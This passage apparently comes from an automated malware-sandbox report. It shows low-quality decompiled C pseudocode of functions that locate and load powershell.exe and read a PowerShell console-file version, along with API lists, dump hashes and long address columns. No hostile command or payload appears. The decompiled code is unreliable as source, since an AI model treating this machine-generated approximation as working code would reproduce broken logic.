                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(powershell.exe,00000000,00000000), ref: 0125DA9B
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0125DAA8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Free$DefaultLanguageLoadVersion$FindPathResourceSearchSystemUsermemset
                                                                                                                                                                                                                              • String ID: %s\%s$MUI$powershell.exe
                                                                                                                                                                                                                              • API String ID: 2934321554-1410073735
                                                                                                                                                                                                                              • Opcode ID: 104615406e2fc856830b02f7ddbc9f30e86a9352c050f737ab438b59de4d8414
                                                                                                                                                                                                                              • Instruction ID: 1324c0068a25f68953ee6243548c14607c00658c1035865f03749a4c50458718
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 104615406e2fc856830b02f7ddbc9f30e86a9352c050f737ab438b59de4d8414
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAA198B1E1026E5BDF719BA49CD4BFF76799B84350F0081A5DE49A7242DA30CEC58F90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125CA89, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 286comCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 26%
                                                                                                                                                                                                                              			E0125CA89(void* __ebx, signed int __ecx, signed int* __edx, signed int* __edi, signed int __esi, void* __eflags) {
				signed int _t90;
				intOrPtr* _t91;
				intOrPtr* _t94;
				signed int _t96;
				signed int _t97;
				signed int _t107;
				signed int _t109;
				signed int* _t110;
				signed int _t113;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t125;
				signed int* _t126;
				signed int* _t130;
				signed int _t133;
				signed int _t134;
				signed int* _t138;
				signed int _t142;
				signed int* _t146;
				signed int _t152;
				intOrPtr* _t166;
				signed int _t171;
				signed int* _t174;
				signed int* _t186;
				signed int* _t189;
				signed int _t197;
				intOrPtr* _t207;
				void* _t209;
				signed int* _t210;

				_t203 = __esi;
				_t200 = __edi;
				_push(0x40);
				E0125A5F0(E0125A941, __ebx, __edi, __esi);
				_t142 = __edx;
				 *(_t209 - 0x38) = __edx;
				 *(_t209 - 0x18) = __ecx;
				if(__edx == 0) {
					L5:
					L6:
					return E0125A59F(_t142, _t200, _t203);
				}
				_t146 =  *(_t209 + 8);
				if(_t146 == 0) {
					goto L5;
				}
				_t189 =  *(_t209 + 0xc);
				if(_t189 == 0) {
					goto L5;
				}
				 *__edx =  *__edx & 0x00000000;
				 *_t189 =  *_t189 | 0xffffffff;
				 *_t146 =  *_t146 | 0xffffffff;
				if(__ecx != 0) {
					 *(_t209 - 0x28) =  *(_t209 - 0x28) & 0x00000000;
					 *((short*)(_t209 - 0x4c)) = 0;
					 *((char*)(_t209 - 0x11)) = 0;
					E0125BBF3(_t209 - 0x4c, __ecx);
					 *((intOrPtr*)(_t209 - 4)) = 0;
					 *(_t209 - 0x1c) = 0;
					 *(_t209 - 0x34) = 0;
					 *(_t209 - 0x2c) = 0;
					 *(_t209 - 0x30) = 0;
					 *((char*)(_t209 - 4)) = 4;
					__imp__CoInitializeEx(0, 0);
					__eflags = 0;
					if(0 >= 0) {
						_t90 = _t209 - 0x1c;
						 *((char*)(_t209 - 0x11)) = 1;
						__imp__CoCreateInstance(0x1253210, 0, 1, 0x1253200, _t90);
						__eflags = _t90;
						if(_t90 >= 0) {
							_t91 =  *(_t209 - 0x1c);
							 *0x1261204(_t91, 0);
							 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0xfc))))();
							_t94 =  *(_t209 - 0x1c);
							_t210 = _t210 - 0x10;
							 *((short*)(_t209 - 0x24)) = 1;
							_t200 = _t210;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t203 =  *( *_t94 + 0xe8);
							_t152 = _t203;
							 *0x1261204(_t94, _t209 - 0x24);
							_t96 =  *_t203();
							__eflags = _t96;
							if(_t96 < 0) {
								L40:
								_t97 =  *(_t209 - 0x1c);
								_push(_t152);
								 *_t210 = _t97;
								__eflags = _t97;
								if(__eflags != 0) {
									_t203 =  *( *_t97 + 4);
									 *0x1261204(_t97);
									 *( *( *_t97 + 4))();
								}
								E0125C5FD(1,  *(_t209 - 0x18), _t200, _t203, __eflags);
								L43:
								_t142 = 0;
								__eflags = 0;
								L44:
								E01259691(_t209 - 0x30);
								E01259691(_t209 - 0x2c);
								E01259691(_t209 - 0x34);
								E01259691(_t209 - 0x1c);
								E0125C219(_t209 - 0x4c);
								__eflags =  *((char*)(_t209 - 0x11));
								if( *((char*)(_t209 - 0x11)) != 0) {
									__imp__CoUninitialize();
								}
								__imp__#6( *(_t209 - 0x28));
								goto L6;
							}
							__eflags =  *((short*)(_t209 - 0x24));
							if( *((short*)(_t209 - 0x24)) == 0) {
								goto L40;
							}
							_t107 =  *(_t209 - 0x1c);
							 *0x1261204(_t107, _t209 - 0x34);
							_t109 =  *((intOrPtr*)( *((intOrPtr*)( *_t107 + 0xb4))))();
							__eflags = _t109;
							if(_t109 < 0) {
								L39:
								_push( *(_t209 - 0x18));
								_t110 =  *0x12606dc; // 0x3403de0
								_push(0x12);
								_push(0);
								_push(_t110);
								_t203 =  *_t110;
								L10:
								 *0x1261204();
								 *((intOrPtr*)(_t203 + 4))();
								goto L43;
							}
							_t113 =  *(_t209 - 0x34);
							__eflags = _t113;
							if(_t113 == 0) {
								goto L39;
							}
							_t207 =  *((intOrPtr*)( *_t113 + 0x34));
							_t166 = _t207;
							 *0x1261204(_t113, _t209 - 0x2c);
							_t115 =  *_t207();
							__eflags = _t115;
							if(_t115 < 0) {
								goto L39;
							}
							_t116 =  *(_t209 - 0x2c);
							__eflags = _t116;
							if(_t116 == 0) {
								goto L39;
							}
							 *(_t209 - 0x20) =  *(_t209 - 0x20) & 0x00000000;
							_t200 = _t209 - 0x20;
							_push(_t166);
							 *_t210 = _t116;
							__eflags = _t116;
							if(__eflags != 0) {
								 *0x1261204(_t116);
								 *((intOrPtr*)( *((intOrPtr*)( *_t116 + 4))))();
							}
							_t203 =  *(_t209 - 0x18);
							_t117 = E0125C8A4(1,  *(_t209 - 0x18), _t200, _t200,  *(_t209 - 0x18), __eflags);
							__eflags = _t117;
							if(_t117 == 0) {
								goto L43;
							} else {
								__eflags = E0125CF4C( *(_t209 - 0x20), _t203);
								if(__eflags == 0) {
									goto L43;
								}
								_push(L"/PSConsoleFile/PSVersion/text()");
								E0125BAF5(1, _t209 - 0x20, _t200, _t203, __eflags);
								 *((char*)(_t209 - 4)) = 5;
								_t203 =  *(_t209 - 0x20);
								__eflags = _t203;
								if(_t203 == 0) {
									_t171 = 0;
									__eflags = 0;
								} else {
									_t171 =  *_t203;
								}
								_t120 =  *(_t209 - 0x2c);
								 *0x1261204(_t120, _t171, _t209 - 0x30);
								_t122 =  *((intOrPtr*)( *((intOrPtr*)( *_t120 + 0x94))))();
								__eflags = _t122;
								if(_t122 >= 0) {
									_t123 =  *(_t209 - 0x30);
									__eflags = _t123;
									if(_t123 != 0) {
										_t196 = _t209 - 0x28;
										_t200 =  *( *_t123 + 0x68);
										_t174 = _t200;
										 *0x1261204(_t123, _t209 - 0x28);
										_t125 =  *_t200();
										__eflags = _t125;
										if(_t125 < 0) {
											goto L27;
										}
										_t130 = E0125BA32(_t174, _t196, _t200,  *(_t209 - 0x28),  *(_t209 + 8),  *(_t209 + 0xc), 1, 1);
										__eflags = _t130;
										if(_t130 == 0) {
											goto L29;
										}
										__imp__#7( *(_t209 - 0x28));
										_t200 = _t130;
										_t197 = 2;
										_t60 =  &(_t200[0]); // 0x1
										_t133 = E0125972E( ~(0 | __eflags > 0x00000000) | _t60 * _t197);
										 *(_t209 - 0x20) = _t133;
										__eflags = _t133;
										if(_t133 == 0) {
											goto L29;
										}
										_t69 =  &(_t200[0]); // 0x1
										_t134 = E0125CE50(_t133, _t69,  *(_t209 - 0x28));
										__eflags = _t134;
										if(_t134 < 0) {
											goto L29;
										}
										 *( *(_t209 - 0x38)) =  *(_t209 - 0x20);
										goto L30;
									}
									_push( *(_t209 - 0x18));
									_push(0x21);
									goto L28;
								} else {
									L27:
									_push( *(_t209 - 0x18));
									_push(0x12);
									L28:
									_t126 =  *0x12606dc; // 0x3403de0
									_t200 =  *_t126;
									 *0x1261204(_t126, 0);
									 *((intOrPtr*)( *_t126 + 4))();
									L29:
									_t142 = 0;
									__eflags = 0;
									L30:
									__eflags = _t203;
									if(_t203 != 0) {
										E0125BB5A(_t203);
									}
									goto L44;
								}
							}
						}
						_push(_t90);
						_push(0xc);
						L9:
						_t186 =  *0x12606dc; // 0x3403de0
						_push(0);
						_push(_t186);
						_t203 =  *_t186;
						goto L10;
					}
					_push(0);
					_push(0xb);
					goto L9;
				}
				_t138 =  *0x12606dc; // 0x3403de0
				_t203 =  *_t138;
				 *0x1261204(_t138, 1, 2, L"NULL");
				 *((intOrPtr*)( *_t138 + 4))();
				goto L5;
			}




































                                                                                                                                                                                                                              0x0125ca89
                                                                                                                                                                                                                              0x0125ca89
                                                                                                                                                                                                                              0x0125ca89
                                                                                                                                                                                                                              0x0125ca90
                                                                                                                                                                                                                              0x0125ca95
                                                                                                                                                                                                                              0x0125ca97
                                                                                                                                                                                                                              0x0125ca9c
                                                                                                                                                                                                                              0x0125caa1
                                                                                                                                                                                                                              0x0125cade
                                                                                                                                                                                                                              0x0125cae0
                                                                                                                                                                                                                              0x0125cae5
                                                                                                                                                                                                                              0x0125cae5
                                                                                                                                                                                                                              0x0125caa3
                                                                                                                                                                                                                              0x0125caa8
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125caaa
                                                                                                                                                                                                                              0x0125caaf
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cab1
                                                                                                                                                                                                                              0x0125cab4
                                                                                                                                                                                                                              0x0125cab7
                                                                                                                                                                                                                              0x0125cabc
                                                                                                                                                                                                                              0x0125cae8
                                                                                                                                                                                                                              0x0125caee
                                                                                                                                                                                                                              0x0125caf8
                                                                                                                                                                                                                              0x0125cafd
                                                                                                                                                                                                                              0x0125cb04
                                                                                                                                                                                                                              0x0125cb07
                                                                                                                                                                                                                              0x0125cb0a
                                                                                                                                                                                                                              0x0125cb0d
                                                                                                                                                                                                                              0x0125cb10
                                                                                                                                                                                                                              0x0125cb15
                                                                                                                                                                                                                              0x0125cb19
                                                                                                                                                                                                                              0x0125cb1f
                                                                                                                                                                                                                              0x0125cb21
                                                                                                                                                                                                                              0x0125cb45
                                                                                                                                                                                                                              0x0125cb48
                                                                                                                                                                                                                              0x0125cb59
                                                                                                                                                                                                                              0x0125cb5f
                                                                                                                                                                                                                              0x0125cb61
                                                                                                                                                                                                                              0x0125cb68
                                                                                                                                                                                                                              0x0125cb78
                                                                                                                                                                                                                              0x0125cb7e
                                                                                                                                                                                                                              0x0125cb80
                                                                                                                                                                                                                              0x0125cb87
                                                                                                                                                                                                                              0x0125cb8a
                                                                                                                                                                                                                              0x0125cb8e
                                                                                                                                                                                                                              0x0125cb96
                                                                                                                                                                                                                              0x0125cb97
                                                                                                                                                                                                                              0x0125cb98
                                                                                                                                                                                                                              0x0125cb99
                                                                                                                                                                                                                              0x0125cb9a
                                                                                                                                                                                                                              0x0125cba0
                                                                                                                                                                                                                              0x0125cba2
                                                                                                                                                                                                                              0x0125cba8
                                                                                                                                                                                                                              0x0125cbaa
                                                                                                                                                                                                                              0x0125cbac
                                                                                                                                                                                                                              0x0125cd62
                                                                                                                                                                                                                              0x0125cd62
                                                                                                                                                                                                                              0x0125cd65
                                                                                                                                                                                                                              0x0125cd68
                                                                                                                                                                                                                              0x0125cd6a
                                                                                                                                                                                                                              0x0125cd6c
                                                                                                                                                                                                                              0x0125cd71
                                                                                                                                                                                                                              0x0125cd76
                                                                                                                                                                                                                              0x0125cd7c
                                                                                                                                                                                                                              0x0125cd7c
                                                                                                                                                                                                                              0x0125cd81
                                                                                                                                                                                                                              0x0125cd86
                                                                                                                                                                                                                              0x0125cd86
                                                                                                                                                                                                                              0x0125cd86
                                                                                                                                                                                                                              0x0125cd88
                                                                                                                                                                                                                              0x0125cd8b
                                                                                                                                                                                                                              0x0125cd93
                                                                                                                                                                                                                              0x0125cd9b
                                                                                                                                                                                                                              0x0125cda3
                                                                                                                                                                                                                              0x0125cdab
                                                                                                                                                                                                                              0x0125cdb0
                                                                                                                                                                                                                              0x0125cdb4
                                                                                                                                                                                                                              0x0125cdb6
                                                                                                                                                                                                                              0x0125cdb6
                                                                                                                                                                                                                              0x0125cdbf
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cdc5
                                                                                                                                                                                                                              0x0125cbb2
                                                                                                                                                                                                                              0x0125cbb7
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cbbd
                                                                                                                                                                                                                              0x0125cbcf
                                                                                                                                                                                                                              0x0125cbd5
                                                                                                                                                                                                                              0x0125cbd7
                                                                                                                                                                                                                              0x0125cbd9
                                                                                                                                                                                                                              0x0125cd4e
                                                                                                                                                                                                                              0x0125cd4e
                                                                                                                                                                                                                              0x0125cd51
                                                                                                                                                                                                                              0x0125cd56
                                                                                                                                                                                                                              0x0125cd58
                                                                                                                                                                                                                              0x0125cd5a
                                                                                                                                                                                                                              0x0125cd5b
                                                                                                                                                                                                                              0x0125cb31
                                                                                                                                                                                                                              0x0125cb34
                                                                                                                                                                                                                              0x0125cb3a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cb3d
                                                                                                                                                                                                                              0x0125cbdf
                                                                                                                                                                                                                              0x0125cbe2
                                                                                                                                                                                                                              0x0125cbe4
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cbf1
                                                                                                                                                                                                                              0x0125cbf4
                                                                                                                                                                                                                              0x0125cbf6
                                                                                                                                                                                                                              0x0125cbfc
                                                                                                                                                                                                                              0x0125cbfe
                                                                                                                                                                                                                              0x0125cc00
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cc06
                                                                                                                                                                                                                              0x0125cc09
                                                                                                                                                                                                                              0x0125cc0b
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cc11
                                                                                                                                                                                                                              0x0125cc15
                                                                                                                                                                                                                              0x0125cc18
                                                                                                                                                                                                                              0x0125cc1b
                                                                                                                                                                                                                              0x0125cc1d
                                                                                                                                                                                                                              0x0125cc1f
                                                                                                                                                                                                                              0x0125cc29
                                                                                                                                                                                                                              0x0125cc2f
                                                                                                                                                                                                                              0x0125cc2f
                                                                                                                                                                                                                              0x0125cc31
                                                                                                                                                                                                                              0x0125cc38
                                                                                                                                                                                                                              0x0125cc3d
                                                                                                                                                                                                                              0x0125cc3f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cc45
                                                                                                                                                                                                                              0x0125cc4f
                                                                                                                                                                                                                              0x0125cc51
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cc57
                                                                                                                                                                                                                              0x0125cc5f
                                                                                                                                                                                                                              0x0125cc64
                                                                                                                                                                                                                              0x0125cc68
                                                                                                                                                                                                                              0x0125cc6b
                                                                                                                                                                                                                              0x0125cc6d
                                                                                                                                                                                                                              0x0125cc73
                                                                                                                                                                                                                              0x0125cc73
                                                                                                                                                                                                                              0x0125cc6f
                                                                                                                                                                                                                              0x0125cc6f
                                                                                                                                                                                                                              0x0125cc6f
                                                                                                                                                                                                                              0x0125cc75
                                                                                                                                                                                                                              0x0125cc88
                                                                                                                                                                                                                              0x0125cc8e
                                                                                                                                                                                                                              0x0125cc90
                                                                                                                                                                                                                              0x0125cc92
                                                                                                                                                                                                                              0x0125ccc8
                                                                                                                                                                                                                              0x0125cccb
                                                                                                                                                                                                                              0x0125cccd
                                                                                                                                                                                                                              0x0125ccd8
                                                                                                                                                                                                                              0x0125ccdd
                                                                                                                                                                                                                              0x0125cce0
                                                                                                                                                                                                                              0x0125cce2
                                                                                                                                                                                                                              0x0125cce8
                                                                                                                                                                                                                              0x0125ccea
                                                                                                                                                                                                                              0x0125ccec
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125ccf9
                                                                                                                                                                                                                              0x0125ccfe
                                                                                                                                                                                                                              0x0125cd00
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cd05
                                                                                                                                                                                                                              0x0125cd0b
                                                                                                                                                                                                                              0x0125cd11
                                                                                                                                                                                                                              0x0125cd12
                                                                                                                                                                                                                              0x0125cd1f
                                                                                                                                                                                                                              0x0125cd24
                                                                                                                                                                                                                              0x0125cd28
                                                                                                                                                                                                                              0x0125cd2a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cd2f
                                                                                                                                                                                                                              0x0125cd34
                                                                                                                                                                                                                              0x0125cd39
                                                                                                                                                                                                                              0x0125cd3b
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cd47
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cd47
                                                                                                                                                                                                                              0x0125cccf
                                                                                                                                                                                                                              0x0125ccd2
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cc94
                                                                                                                                                                                                                              0x0125cc94
                                                                                                                                                                                                                              0x0125cc94
                                                                                                                                                                                                                              0x0125cc97
                                                                                                                                                                                                                              0x0125cc99
                                                                                                                                                                                                                              0x0125cc99
                                                                                                                                                                                                                              0x0125cca1
                                                                                                                                                                                                                              0x0125cca6
                                                                                                                                                                                                                              0x0125ccac
                                                                                                                                                                                                                              0x0125ccb2
                                                                                                                                                                                                                              0x0125ccb2
                                                                                                                                                                                                                              0x0125ccb2
                                                                                                                                                                                                                              0x0125ccb4
                                                                                                                                                                                                                              0x0125ccb4
                                                                                                                                                                                                                              0x0125ccb6
                                                                                                                                                                                                                              0x0125ccbe
                                                                                                                                                                                                                              0x0125ccbe
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125ccb6
                                                                                                                                                                                                                              0x0125cc92
                                                                                                                                                                                                                              0x0125cc3f
                                                                                                                                                                                                                              0x0125cb63
                                                                                                                                                                                                                              0x0125cb64
                                                                                                                                                                                                                              0x0125cb26
                                                                                                                                                                                                                              0x0125cb26
                                                                                                                                                                                                                              0x0125cb2c
                                                                                                                                                                                                                              0x0125cb2e
                                                                                                                                                                                                                              0x0125cb2f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cb2f
                                                                                                                                                                                                                              0x0125cb23
                                                                                                                                                                                                                              0x0125cb24
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125cb24
                                                                                                                                                                                                                              0x0125cabe
                                                                                                                                                                                                                              0x0125cacc
                                                                                                                                                                                                                              0x0125cad2
                                                                                                                                                                                                                              0x0125cad8
                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0125CA90
                                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,?,00000040,0125B7E0,00000000,00000001), ref: 0125CB19
                                                                                                                                                                                                                              • CoCreateInstance.OLE32(01253210,00000000,00000001,01253200,00000000,?,00000040,0125B7E0,00000000,00000001), ref: 0125CB59
                                                                                                                                                                                                                              • SysStringLen.OLEAUT32(00000000), ref: 0125CD05
                                                                                                                                                                                                                              • CoUninitialize.OLE32(?,?,?,00000000,00000001), ref: 0125CDB6
                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0125CDBF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: String$CreateFreeH_prolog3_InitializeInstanceUninitialize
                                                                                                                                                                                                                              • String ID: /PSConsoleFile/PSVersion/text()$NULL
                                                                                                                                                                                                                              • API String ID: 1646121346-3169875599
                                                                                                                                                                                                                              • Opcode ID: 8f8a4b3ba1661b560ffad390148fc4ef93fcc8cc9f80e3a4deffa5ef0155712e
                                                                                                                                                                                                                              • Instruction ID: d30153a2d8eda0068c1e20479d72e65d3f38d1a87a136415c7d96e2ae798d065
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f8a4b3ba1661b560ffad390148fc4ef93fcc8cc9f80e3a4deffa5ef0155712e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADA1A070A102069FDF54DFA8D985BAE7BB9FF48715F048118EE02EB294EB70AC11CB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125E590, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 163COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 56%
                                                                                                                                                                                                                              			E0125E590(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v24;
				signed int _v28;
				short _v44;
				char _v48;
				intOrPtr _v52;
				WCHAR* _v56;
				char _v526;
				short _v528;
				signed int _t48;
				intOrPtr* _t50;
				void* _t54;
				void* _t57;
				signed int _t71;
				signed int _t84;
				void* _t90;
				WCHAR* _t93;
				WCHAR* _t94;
				void* _t95;
				WCHAR* _t100;
				void* _t123;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				intOrPtr _t129;
				signed int _t130;
				void* _t131;
				void* _t140;
				void* _t141;
				signed int _t142;
				signed int _t144;

				_t123 = __edx;
				_t142 = _t144;
				_t48 =  *0x1260358; // 0xc21f7063
				_v8 = _t48 ^ _t142;
				_t93 = _a4;
				_t125 = __ecx;
				_t50 =  *((intOrPtr*)(__ecx + 8));
				_t129 =  *_t50;
				 *0x1261204(_t50, 0,  &_v528, 0x104, __edi, __esi, __ebx, _t141);
				 *0x1261204( *((intOrPtr*)(__ecx + 8)),  *((intOrPtr*)(_t129 + 0xc))());
				_t54 =  *((intOrPtr*)(_t129 + 8))();
				if(_t54 != 0) {
					_t11 = _t54 - 1; // -1
					_t130 = _t11;
					__eflags = _t130;
					if(__eflags >= 0) {
						while(1) {
							__eflags =  *((short*)(_t142 + _t130 * 2 - 0x20c)) - 0x5c;
							if(__eflags == 0) {
								goto L6;
							}
							_t130 = _t130 - 1;
							__eflags = _t130;
							if(__eflags >= 0) {
								continue;
							}
							goto L6;
						}
					}
					L6:
					_t100 = _t93;
					_push( &_v526 + _t130 * 2);
					_t57 = E0125E76E(_t93, _t100, _t125, _t130, __eflags);
					_t131 = 2 + _t130 * 2;
					__eflags = _t131 - 0x208;
					if(_t131 >= 0x208) {
						E01259D26(_t57, _t93, _t100, _t123, _t125, _t131);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						E0125A5F0(E0125AA71, _t93, _t125, _t131);
						_t94 = _t100;
						_t126 = _a12;
						_v28 = _v28 & 0x00000000;
						_v52 = _a8;
						_v56 = _a4;
						_v24 = 7;
						_v44 = 0;
						E0125EFA5( &_v48, __eflags, _a4, E0125F255(_a4));
						_v8 = _v8 & 0x00000000;
						E0125ED61( &_v48, __eflags, _v52, E0125F255(_v52));
						E0125ED61( &_v48, __eflags, L".ni.dll", E0125F255(L".ni.dll"));
						_t135 =  *( *_t94);
						 *0x1261204( &_v48, 0x28);
						_t71 =  *((intOrPtr*)( *( *_t94)))();
						__eflags = _t71;
						if(_t71 != 0) {
							L10:
							E0125EF00(_t126,  &_v48, 0, 0xffffffff);
						} else {
							E0125EFA5( &_v48, __eflags, _v56, E0125F255(_v56));
							E0125ED61( &_v48, __eflags, _v52, E0125F255(_v52));
							E0125ED61( &_v48, __eflags, L".dll", E0125F255(L".dll"));
							_t135 =  *( *_t94);
							 *0x1261204( &_v48);
							_t84 =  *((intOrPtr*)( *( *_t94)))();
							__eflags = _t84;
							if(_t84 != 0) {
								goto L10;
							}
						}
						E0125EC6D( &_v48, 1, 0);
						return E0125A59F(_t94, _t126, _t135);
					} else {
						 *((short*)(_t142 + _t131 - 0x20c)) = 0;
						ExpandEnvironmentStringsW( &_v528, _t93, 0x104);
						ExpandEnvironmentStringsW(L"%windir%\\System32\\WindowsPowerShell\\v1.0\\",  &(_t93[0x104]), 0x104);
						_t90 = 0;
						goto L2;
					}
				} else {
					_t90 = 0xffff0000;
					L2:
					_pop(_t127);
					_pop(_t140);
					_pop(_t95);
					return E01259A40(_t90, _t95, _v8 ^ _t142, _t123, _t127, _t140);
				}
			}


































                                                                                                                                                                                                                              0x0125e590
                                                                                                                                                                                                                              0x0125e593
                                                                                                                                                                                                                              0x0125e59b
                                                                                                                                                                                                                              0x0125e5a2
                                                                                                                                                                                                                              0x0125e5a6
                                                                                                                                                                                                                              0x0125e5ab
                                                                                                                                                                                                                              0x0125e5bb
                                                                                                                                                                                                                              0x0125e5bf
                                                                                                                                                                                                                              0x0125e5c4
                                                                                                                                                                                                                              0x0125e5d4
                                                                                                                                                                                                                              0x0125e5da
                                                                                                                                                                                                                              0x0125e5df
                                                                                                                                                                                                                              0x0125e5f9
                                                                                                                                                                                                                              0x0125e5f9
                                                                                                                                                                                                                              0x0125e5fc
                                                                                                                                                                                                                              0x0125e5fe
                                                                                                                                                                                                                              0x0125e600
                                                                                                                                                                                                                              0x0125e600
                                                                                                                                                                                                                              0x0125e609
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125e60b
                                                                                                                                                                                                                              0x0125e60b
                                                                                                                                                                                                                              0x0125e60e
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125e60e
                                                                                                                                                                                                                              0x0125e600
                                                                                                                                                                                                                              0x0125e610
                                                                                                                                                                                                                              0x0125e616
                                                                                                                                                                                                                              0x0125e61b
                                                                                                                                                                                                                              0x0125e61c
                                                                                                                                                                                                                              0x0125e621
                                                                                                                                                                                                                              0x0125e628
                                                                                                                                                                                                                              0x0125e62e
                                                                                                                                                                                                                              0x0125e665
                                                                                                                                                                                                                              0x0125e66a
                                                                                                                                                                                                                              0x0125e66b
                                                                                                                                                                                                                              0x0125e66c
                                                                                                                                                                                                                              0x0125e66d
                                                                                                                                                                                                                              0x0125e66e
                                                                                                                                                                                                                              0x0125e66f
                                                                                                                                                                                                                              0x0125e677
                                                                                                                                                                                                                              0x0125e67c
                                                                                                                                                                                                                              0x0125e686
                                                                                                                                                                                                                              0x0125e689
                                                                                                                                                                                                                              0x0125e68d
                                                                                                                                                                                                                              0x0125e692
                                                                                                                                                                                                                              0x0125e695
                                                                                                                                                                                                                              0x0125e69c
                                                                                                                                                                                                                              0x0125e6aa
                                                                                                                                                                                                                              0x0125e6b4
                                                                                                                                                                                                                              0x0125e6c2
                                                                                                                                                                                                                              0x0125e6d8
                                                                                                                                                                                                                              0x0125e6e3
                                                                                                                                                                                                                              0x0125e6e7
                                                                                                                                                                                                                              0x0125e6ef
                                                                                                                                                                                                                              0x0125e6f1
                                                                                                                                                                                                                              0x0125e6f3
                                                                                                                                                                                                                              0x0125e74b
                                                                                                                                                                                                                              0x0125e755
                                                                                                                                                                                                                              0x0125e6f5
                                                                                                                                                                                                                              0x0125e704
                                                                                                                                                                                                                              0x0125e718
                                                                                                                                                                                                                              0x0125e72e
                                                                                                                                                                                                                              0x0125e739
                                                                                                                                                                                                                              0x0125e73d
                                                                                                                                                                                                                              0x0125e745
                                                                                                                                                                                                                              0x0125e747
                                                                                                                                                                                                                              0x0125e749
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125e749
                                                                                                                                                                                                                              0x0125e761
                                                                                                                                                                                                                              0x0125e76b
